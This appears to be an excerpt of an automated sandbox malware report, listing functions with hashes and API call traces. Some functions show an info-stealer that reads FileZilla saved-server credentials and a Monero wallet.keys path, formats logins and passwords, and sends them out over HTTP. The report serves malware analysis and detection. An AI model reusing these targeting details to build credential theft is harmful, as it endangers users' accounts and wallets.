                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: A,{9$^2-<
                            • API String ID: 0-2065318020
                            • Opcode ID: ed2babb759d452c3ba873a5829e8aae3f2328c2373a3babfe5179d69bff79a2d
                            • Instruction ID: e8619c73af039aee587fb8180bd9fbb6edca4c3549cd0c28b722e4cdc36429fa
                            • Opcode Fuzzy Hash: ed2babb759d452c3ba873a5829e8aae3f2328c2373a3babfe5179d69bff79a2d
                            • Instruction Fuzzy Hash: 5CB2E3F360C2009FE304AE29EC8567AFBE9EF94720F16893DEAC5C7744E63558058796
                            Function 0075B9B4 Relevance: 2.9, Strings: 2, Instructions: 427COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: E|${ev
                            • API String ID: 0-407735908
                            • Opcode ID: 6336fd2d88fce9929ff64282b75dbe3a9f2c079078a0655b1bae502ee54a5b47
                            • Instruction ID: 538bb1685a0261f75bd2d841587106c45fdaf54e7317e3eecf5c236fe34b5bc8
                            • Opcode Fuzzy Hash: 6336fd2d88fce9929ff64282b75dbe3a9f2c079078a0655b1bae502ee54a5b47
                            • Instruction Fuzzy Hash: C0D1CFB260C6049FE304AE2AEC8567AF7E5EF98320F16893DE6C487704EA7558418B57
                            Function 007072E7 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (?UJ$As>
                            • API String ID: 0-1445874830
                            • Opcode ID: 78736c65eaa937c82f71ffbc4bf966e90b45ccb1d57ed541c75c7a26abdbe9f2
                            • Instruction ID: e28b59a504e723bfa414a5d9163e3871420c457851031fb8fb555cd5af69ff80
                            • Opcode Fuzzy Hash: 78736c65eaa937c82f71ffbc4bf966e90b45ccb1d57ed541c75c7a26abdbe9f2
                            • Instruction Fuzzy Hash: 2E6147F3A08204AFE344AE3DED5577AB7E5EF90310F1A892DE5C5C3744EA3598048786
                            Function 005E109A Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: V
                            • API String ID: 0-1342839628
                            • Opcode ID: 4ccb84c4e49ec78705c905737ebb6da9d9e0eeb79040fe1712357612e33bdd67
                            • Instruction ID: 2e8c5e61306404c9b4318b4e77ac1dfda4c34cd556bfc25dc2de6222732ef782
                            • Opcode Fuzzy Hash: 4ccb84c4e49ec78705c905737ebb6da9d9e0eeb79040fe1712357612e33bdd67
                            • Instruction Fuzzy Hash: 5D4106B240C3599FD7099F19D9446BE7FE8FF51320F20882EE9C282A45E6364D14EB5A
                            Function 006D411C Relevance: .2, Instructions: 206COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c4402c2247bc3316b39991198b1e9e8d6a5116b275b891d0bf480f801f1f50d8
                            • Instruction ID: 7d5f26b146208982ba5ced610bba18fbbde16f0dde34bbe60be50a00ccb513c6
                            • Opcode Fuzzy Hash: c4402c2247bc3316b39991198b1e9e8d6a5116b275b891d0bf480f801f1f50d8
                            • Instruction Fuzzy Hash: 7551F5B3E081104FE3186928DC547BAB7DAEBD4321F2B463EEA88D3BC4D9395C014696
                            Function 00619B39 Relevance: .2, Instructions: 191COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc2939c0d5abdf8046fae098503841059c8e938f84c25bd64a0bc4a1b29ba67f
                            • Instruction ID: 58f42d40b886c1004f1b49e820b25346275594027341bace4ded956c918afe2f
                            • Opcode Fuzzy Hash: dc2939c0d5abdf8046fae098503841059c8e938f84c25bd64a0bc4a1b29ba67f
                            • Instruction Fuzzy Hash: 335157F3E086105FF3049E28EC8177AB7D5DBD0720F1A853EEA89A3784E5785C058292
                            Function 00608B2D Relevance: .2, Instructions: 172COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: baca68dac8c34ada0da8c4935e2fea72d3e79bb4897dd50f7bfb31e187160030
                            • Instruction ID: 8da1238256ad5eef78e3bbd1be1e5041deaf828a7e05c9237894f90739a9dfab
                            • Opcode Fuzzy Hash: baca68dac8c34ada0da8c4935e2fea72d3e79bb4897dd50f7bfb31e187160030
                            • Instruction Fuzzy Hash: D9512CF3B082049BE304AA39DC8476BBBD7EBE4310F2A863DD7C487798F93954058646
                            Function 006DE608 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 44d327ec47a06b9a08621f7d4e2e6c58e9f3d4630ca117155e354547a1d39c5c
                            • Instruction ID: 62d377606b3f50b337ea0a6ff3038b22f91e4a22527284105bfca6f7a52f0719
                            • Opcode Fuzzy Hash: 44d327ec47a06b9a08621f7d4e2e6c58e9f3d4630ca117155e354547a1d39c5c
                            • Instruction Fuzzy Hash: 993114F3E582049BF7185929DC857BAB697DBD0320F2F823D9B88437C8E97D080A4295
                            Function 00399750 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 00390250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,003A0DBA,003A0DB7,003A0DB6,003A0DB3), ref: 00390362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00390369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00390385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 003903CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 003903DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00390419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00390463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00390562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00390571
                            • lstrcat.KERNEL32(?,url: ), ref: 00390580
                            • lstrcat.KERNEL32(?,00000000), ref: 00390593
                            • lstrcat.KERNEL32(?,003A1678), ref: 003905A2
                            • lstrcat.KERNEL32(?,00000000), ref: 003905B5
                            • lstrcat.KERNEL32(?,003A167C), ref: 003905C4
                            • lstrcat.KERNEL32(?,login: ), ref: 003905D3
                            • lstrcat.KERNEL32(?,00000000), ref: 003905E6
                            • lstrcat.KERNEL32(?,003A1688), ref: 003905F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00390604
                            • lstrcat.KERNEL32(?,00000000), ref: 00390617
                            • lstrcat.KERNEL32(?,003A1698), ref: 00390626
                            • lstrcat.KERNEL32(?,003A169C), ref: 00390635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: be84ad1ad8311be02e67bc22c9c744ec49c6bd1dc40b2ae9ea0711fce3886d62
                            • Instruction ID: a8200298fc44d078c5b74f27d1de36e15b50fe425833eb7423e421abd9c223a7
                            • Opcode Fuzzy Hash: be84ad1ad8311be02e67bc22c9c744ec49c6bd1dc40b2ae9ea0711fce3886d62
                            • Instruction Fuzzy Hash: 36D13D72910608AFDF06EBE4DD96EEE7778EF15300F404518F502BA091DF74AA0ADBA1
                            Function 00385960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                              • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003859F8
                            • StrCmpCA.SHLWAPI(?,0115E828), ref: 00385A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00385B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0115E8A8,00000000,?,0115A6A0,00000000,?,003A1A1C), ref: 00385E71
                            • lstrlen.KERNEL32(00000000), ref: 00385E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00385E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00385E9A
                            • lstrlen.KERNEL32(00000000), ref: 00385EAF
                            • lstrlen.KERNEL32(00000000), ref: 00385ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00385EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00385F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00385F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00385F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00385FB0
